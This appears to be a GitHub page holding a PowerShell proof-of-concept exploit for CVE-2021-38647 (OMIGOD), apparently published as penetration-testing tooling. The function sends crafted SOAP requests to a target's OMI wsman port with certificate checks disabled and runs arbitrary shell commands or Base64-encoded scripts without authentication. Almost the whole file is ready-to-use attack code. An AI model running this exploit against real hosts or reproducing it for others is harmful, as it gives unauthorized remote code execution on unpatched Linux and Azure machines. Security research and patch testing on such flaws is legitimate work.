-
Notifications
You must be signed in to change notification settings - Fork 22
/
Invoke-CVE-2021-38647.ps1
174 lines (144 loc) · 5.77 KB
/
Invoke-CVE-2021-38647.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
Function Invoke-CVE-2021-38647
{
<#
.SYNOPSIS
CVE-2021-38647 - POC to exploit unauthenticated RCE #OMIGOD
.DESCRIPTION
Exploit CVE-2021-38647 (OMIGOD) on a remote machine and execute command
.PARAMETER TargetIP
Enter IP Address of the target machine.
.PARAMETER TargetPort
Enter Target Port number on which the OMI service is running.
.PARAMETER Command
Enter the command that needs to be executed on the target machine.
.PARAMETER Script
Enter the Base64 encoded commands that needs to be executed on the target machine. We can add multiple commands and encode it to base64 and execute all the commands at once.
.EXAMPLE
PS> Invoke-CVE-2021-38647 -TargetIP 1.1.1.1 -TargetPort 5986 -Command id
.EXAMPLE
PS> $MyScript = @"
id
whoami
uname -a
"@
PS> $enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
PS> Invoke-CVE-2021-38647 -TargetIP 1.1.1.1 -TargetPort 5986 -Script $enc
.LINK
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
https://github.com/microsoft/omi
https://github.com/microsoft/SCXcore
.NOTES
POC created based on the blog post published by WIZ team at
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
Author: Chirag Savla (@chiragsavla94) of Altered Security Pte Ltd.
Credit: WIZ Team (@wiz_io)
#>
param (
[string]$TargetIP,
[string]$TargetPort,
[string]$Command,
[string]$Script
)
Add-Type -AssemblyName System.Web
$cmd = [System.Web.HttpUtility]::HtmlEncode($Command)
$EndPoint = "https://$TargetIP"+":"+"$TargetPort/wsman"
$Body = [XML]@"
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" >
<s:Header>
<a:To>HTTP://127.0.0.1:5986/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:6B72D22C-CC07-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"></w:OptionSet>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteShellCommand_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>$cmd</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
"@
$ScriptBody = @"
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" >
<s:Header>
<a:To>HTTP://127.0.0.1:5986/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:DFAB024A-CC2A-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"></w:OptionSet>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteScript_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:Script>$Script</p:Script>
<p:Arguments></p:Arguments>
<p:timeout>0</p:timeout>
<p:b64encoded>true</p:b64encoded>
</p:ExecuteScript_INPUT>
</s:Body>
</s:Envelope>
"@
$header = @{
"Content-Type" = "application/soap+xml;charset=UTF-8"
}
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
if($Command)
{
[xml]$result = (Invoke-WebRequest -Uri $EndPoint -Body $Body -Headers $header -Method Post).Content
}
elseif($Script)
{
[xml]$result = (Invoke-WebRequest -Uri $EndPoint -Body $ScriptBody -Headers $header -Method Post).Content
}
else
{
Write-Output "Please pass `$Command or `$Script argument."
}
if($result)
{
if($result.Envelope.Body.ChildNodes.ReturnCode -eq 0)
{
Write-Output $result.Envelope.Body.ChildNodes.StdOut
}
else
{
Write-Output $result.Envelope.Body.ChildNodes.StdErr
}
}
}